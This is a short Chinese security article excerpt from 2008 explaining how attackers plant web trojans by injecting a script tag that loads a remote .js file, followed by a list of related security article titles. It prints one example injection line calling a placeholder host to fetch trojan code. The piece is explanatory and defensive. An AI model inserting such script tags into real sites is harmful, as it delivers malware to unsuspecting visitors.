解析网页后门和挂马

新客网 XKER.COM 2008-03-06 来源：it168 甘肃老五 收藏本文

   2、js调用型网页挂马
    js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术，如：黑客先制作一个.js文件，然后利用js代码调用到挂马的网页。通常代码如下：

 

    <script language=javascript src=http://www.xxx.com/gm.js></script>
    http://www.xxx.com/gm.js就是一个js脚本文件，通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成，攻击者只需输入相关的选项就可以了，如图2就是一个JS木马的代码。（图2）

• ·轻松挖出恶意网站中藏的病毒
• ·解析网页后门和挂马
• ·[攻防手记]SQL存储过程带来的安全危险
• ·区分正邪两类黑客的四大主要行为
• ·多角度详细解释网站安全保护方法
• ·网络组网时路由器能替代防火墙吗?
• ·安全技巧：学会检查SQL注入式攻击漏洞
• ·对付黑客用Tcptrack跟踪TCP连接
• ·有备无患 畅游网络世界的十大安全技巧
• ·通过客户端上网流程发现是否挂马
• ·合理规划：构建网络整体安全方案
• ·陈冠希事件的启示 明星网络安全防范手册
• ·视频文件夹带木马的常见应对策略
• ·九大策略 保护用户计算机远离黑客骚扰
• ·如何利用加密方法保障电子邮件系统安全
• ·娱乐也要安全 剔除电影中暗藏的木马